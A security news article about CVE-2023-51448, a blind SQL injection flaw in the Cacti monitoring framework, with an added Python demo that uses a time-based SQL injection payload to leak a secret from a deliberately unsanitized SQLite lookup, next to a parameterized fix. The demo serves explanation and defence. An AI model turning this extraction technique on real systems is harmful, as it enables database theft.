A critical vulnerability in the Cacti Web-based open source framework for monitoring network performance gives attackers a way to disclose Cacti's entire database contents — presenting a prickly risk for organizations.
Thousands of websites use Cacti to collect network performance information such as that related to bandwidth utilization, CPU and memory usage, and disk I/O — from devices such as routers, switches, and servers. Organizations use the collected data to populate the Round Robin Database utility (RRDTool) so they can create graphic and visual metrics from it.
As such, it has reach into the entire IT footprint within an organization — offering invaluable reconnaissance opportunities for cyberattackers, as well as a pivot point to go deeper into the network.
Importantly, an attacker could also chain CVE-2023-51448 with another, previously disclosed Cacti vulnerability — CVE-2023-49084 — to achieve remote code execution (RCE) on vulnerable systems.
CVE-2023-51448 in Cacti: Insufficient Sanitization
The vulnerability, tracked as CVE-2023-51448, is present in Cacti version 1.2.25. Cacti has released an updated version of the software that addresses the bug.
The issue has to do with the app not properly sanitizing input data, thereby leaving the path open for what is known as a blind SQL injection attack. GitHub has assigned the vulnerability a severity rating of 8.8 out of a maximum possible 10 on the CVSS 3.1 scale and described it as an issue that requires an attacker to only have low privileges to exploit.
Matthew Hogg, a security researcher from Synopsys who discovered the vulnerability and reported it to the maintainers of Cacti last month, says an attacker would need an authenticated account with the "Settings/Utilities" privilege to exploit the flaw.
"Finding systems running Cacti is trivial, as a malicious actor can use a service like Shodan to query for live systems," Hogg says. "A malicious actor, using [Shodan], could automate their initial reconnaissance to find systems running vulnerable versions to focus their activities."
As of Monday morning, a Shodan search listed more than 4,000 Cacti hosts that are potentially running vulnerable versions of Cacti, he says.
According to Hogg, to trigger CVE-2023-51448, an authenticated attacker with Settings/Utilities privileges would need to send a specially crafted HTTP GET request with an SQL injection payload to the endpoint '/managers.php'.
"Using a blind SQL technique, an attacker can disclose Cacti database contents or trigger remote code execution (RCE)," Hogg says.
Blind SQL Means Mass Attacks Unlikely, Still a Thorny Issue
In a blind SQL injection attack, the attacker never sees the direct result of the injected SQL query. Instead, the result has to be inferred from some observable side effect of how the application responds, one yes/no question at a time.
"Blind is often used to describe SQL injection in which the results are not directly returned to the attacker but are inferred out-of-band using an oracle," Hogg says, referring to external sources of information such as error messages and timing delays. "In this case a time-based oracle can be used to check if some Boolean condition is met. The differential between response times is used to evaluate if the condition was met, which could, for example, be checking the value of a character the attacker wants to leak."
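To make the time-based oracle Hogg describes concrete, the following is an added example written for this article; it is not Cacti code and not from the advisory. It stands up a throwaway SQLite database with a hypothetical `settings` table, a deliberately unsanitized lookup that plays the role of a vulnerable endpoint, and the parameterized version of the same lookup. The extraction loop asks the database one bit of one character per request and reads "true" purely from the response delay, which is how a blind injection leaks a table one bit at a time even though no query output ever reaches the attacker. The table, column, secret and payload shape are all assumptions for the demo; SQLite has no `SLEEP()`, so a Python one is registered to stand in for the native function MySQL (which Cacti uses) provides.

```python
import sqlite3
import time

DELAY = 0.1            # seconds the injected sleep() pauses: the timing oracle
THRESHOLD = DELAY / 2  # a response slower than this is read as "condition true"


def make_db():
    """Constructed demo database (not Cacti's schema) holding one secret to leak."""
    conn = sqlite3.connect(":memory:")
    # SQLite lacks SLEEP(); register one so the payload behaves as it would on MySQL.
    conn.create_function("sleep", 1, lambda s: time.sleep(s))
    conn.execute("CREATE TABLE settings (name TEXT, value TEXT)")
    conn.execute("INSERT INTO settings VALUES ('api_token', 'c4ct1')")
    conn.commit()
    return conn


def vulnerable_lookup(conn, name):
    """Insufficient sanitization: the request parameter is concatenated into SQL."""
    sql = "SELECT value FROM settings WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, name):
    """Fix: bind the parameter, so the payload is an inert string that matches nothing."""
    return conn.execute("SELECT value FROM settings WHERE name = ?", (name,)).fetchall()


def oracle(lookup, conn, payload):
    """Time-based oracle: True when the server took noticeably longer to answer.
    Nothing in the response body is inspected; only the elapsed time matters."""
    start = time.perf_counter()
    lookup(conn, payload)
    return time.perf_counter() - start > THRESHOLD


def bit_probe(pos, bit):
    """Payload asking: is bit `bit` of character `pos` of the secret set?
    If so the subquery sleeps; otherwise it returns immediately."""
    return (
        "' OR (SELECT CASE WHEN coalesce(unicode(substr(value,"
        f"{pos},1)),0) & {1 << bit} THEN sleep({DELAY}) ELSE 0 END "
        "FROM settings WHERE name='api_token') -- "
    )


def leak_secret(lookup, conn, max_len=16):
    """Recover the secret one character at a time, 7 oracle queries per character
    (printable ASCII fits in 7 bits). A character of 0 means we ran off the end."""
    secret = ""
    for pos in range(1, max_len + 1):
        code = 0
        for bit in range(7):
            if oracle(lookup, conn, bit_probe(pos, bit)):
                code |= 1 << bit
        if code == 0:
            break
        secret += chr(code)
    return secret


if __name__ == "__main__":
    print("vulnerable endpoint leaks:", repr(leak_secret(vulnerable_lookup, make_db())))
    print("hardened endpoint leaks:  ", repr(leak_secret(hardened_lookup, make_db())))
```

Against the unsanitized lookup the loop recovers the whole token without ever seeing a row; against the bound-parameter lookup every probe returns instantly, so every bit reads as 0 and nothing is leaked. The per-bit probing is also why such attacks are slow and noisy in practice: leaking a single 32-byte hash costs a few hundred requests, each deliberately delayed, which is the kind of traffic pattern a request-latency or query-rate alert can catch.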
Blind SQL injection attacks are hard to pull off on a mass scale. However, an attacker with access to an account with the required privileges can exploit the vulnerability in Cacti with ease, Hogg notes. "Blind SQL Injections are easy to execute, but difficult to exploit due to the nature of the attack vector."
However, referring to the potential for chaining the vulnerability with the aforementioned bug, the security researcher says: "A competent attacker who satisfies the prerequisites for CVE-2023-49084 would be able to execute CVE-2023-51448 in a trivial manner."
The latest vulnerability is one of several that researchers have reported in Cacti over the past year. One of the more serious among them is CVE-2022-46169, an unauthenticated command injection vulnerability disclosed last January for which an exploit became publicly available a few months later. Another is CVE-2023-39362, a vulnerability disclosed in June for which exploits became publicly available in October.